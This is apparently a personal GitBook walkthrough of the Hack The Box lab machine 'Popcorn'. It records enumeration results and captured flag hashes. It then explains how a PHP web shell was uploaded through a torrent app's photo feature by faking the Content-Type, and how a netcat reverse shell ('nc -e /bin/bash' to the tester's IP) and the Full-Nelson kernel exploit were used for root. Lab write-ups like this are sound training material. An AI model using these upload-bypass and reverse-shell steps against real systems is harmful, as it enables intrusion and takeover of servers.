Hacking
  • Penetration Testing
  • Methodologies
    • Exfil
    • Manual Enumeration
    • Basic Buffer Overflow
    • Basic Internal Network test
    • Basic Mobile Testing guide
    • Basic Subdomain Enumeration guide
  • Guides
    • Build A Raspberry Pi Dropbox
    • Golang
    • Powershell / PowerView
    • PurpleSharp
  • Hack The Box last updated - 2019
    • Legacy
    • Devel
    • Optimum
    • Popcorn
    • Beep
    • Tenten
    • Arctic
    • Cronos
    • Grandpa
    • Granny
    • October
    • Lazy
    • Sneaky
    • Holiday
    • Blocky
    • Shrek
    • Blue
    • Joker
    • Europa
    • Haircut
    • Bank
    • SolidState
    • Mantis
    • Shocker
    • Tally
    • Sense
    • Jeeves
    • Stratosphere
    • Inception
    • Bashed
    • Fluxcapacitor
    • Canape
    • Rabbit
    • Chatterbox
    • Nibbles
    • Sunday
    • Aragog
    • Valentine
    • Silo
    • Olympus
    • Poison
    • Celestial
    • Waldo
    • Jerry
    • Access
    • Active
    • Netmon
  • scriptz
  • Issues
    • gists
    • Boring Issues
Powered by GitBook
On this page
  • Popcorn - 10.10.10.6
  • Target Enumeration:
  • Ports / Services / Software Versions Running
  • Vulnerability Exploited:
  • Privilege escalation
  • Exploiting the host:
  1. Hack The Box last updated - 2019

Popcorn

PreviousOptimumNextBeep

Last updated 6 years ago

Popcorn - 10.10.10.6

Target Enumeration:

OS: Linux

IP: 10.10.10.6

User: 5e36a919398ecc5d5c110f2d865cf136

Root: f122331023a9393319a0370129fd9b14

Ports / Services / Software Versions Running 

22/tcp open ssh OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0) 
80/tcp open http Apache httpd 2.2.12 ((Ubuntu))

Vulnerability Exploited:

Photo upload allows remote code execution by injecting a malicious php file and modifying the request with burp.

Privilege escalation

Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04) - 'Full-Nelson.c' Local Privilege Escalation

Exploiting the host:

Nmap

Dirb found /torrent

Appears to be a torrent hosting application

Application allows users to sign up and upload torrents.

Find a clean torrent file (I used debian)

Upload it to the app.

Edit the torrent once it is uploaded.

The vulnerable point is the photo section so find a simple backdoor php shell.

Rename it to shell.jpg.php and upload the shell to the app. Catch the request in burp.

Change content type to: Content-Type: image/jpg

This successfully uploaded.

Inspect the image from the webapp to find the true path.

Visit the true path and issue ?cmd=id after the .php extension.

Looking in /bin we see nc is installed.

Set a listener in 443 and execute nc -e /bin/bash 10.10.14.11 443 via the browser.

Now you have a shell.

Move to /dev/shm and download enumeration scripts

Google the kernel for privesc opportunities.

Run further tools while researching kernel exploits.

Easiest way may be full nelson based on the uname -a output.

Download from exploitdb

Now on popcorn download and compile the exploit then run it to get root.

wget

https://www.exploit-db.com/exploits/14339/
https://www.exploit-db.com/download/15704.c